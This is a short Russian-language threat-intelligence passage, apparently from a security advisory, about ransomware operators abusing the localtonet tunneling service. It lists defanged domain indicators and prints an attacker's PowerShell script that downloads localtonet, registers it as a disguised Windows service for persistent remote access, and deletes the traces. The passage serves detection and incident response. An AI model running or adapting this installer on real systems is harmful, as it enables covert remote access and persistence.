localtonet (localtonet[.]com). Этот инструмент даёт очень удобные фичи атакующим: оператор может удалённо выбирать, к какому сервису и на какой системе внутри сети нужно организовать доступ извне.Настоятельно рекомендуем проверять такие сетевые индикаторы:
localtonet[.]com
*.localtonet[.]com
*.localto[.]net
Можно проверять запуски в командных строках и процессах по названиям бинарей – атакующие используют ванильные архивы от разработчика софта. Пример скрипта Powershell по установке localtonet на скомпрометированной системе:
powershell iwr http[://]localtonet[.]com/download/localtonet-win-64.zip -outfile ltn.zip -usebasicparsing;
expand-archive -force -path ltn.zip -destinationpath C:\Windows\Temp;
iwr http[://]localtonet[.]com/nssm-2.24.zip -outfile nssm.zip -usebasicparsing;
expand-archive -force -path nssm.zip -destinationpath C:\Windows\Temp;
C:\Windows\Temp\nssm-2.24\win64\nssm.exe install Win32_Serv C:\Windows\Temp\localtonet.exe authtoken <token>;
C:\Windows\Temp\nssm-2.24\win64\nssm.exe start Win32_Serv;
rm nssm.zip;
rm ltn.zip;
Если подобная активность обнаружена, стоит реагировать по плейбуку борьбы с шифровальщиком – то есть максимально оперативно.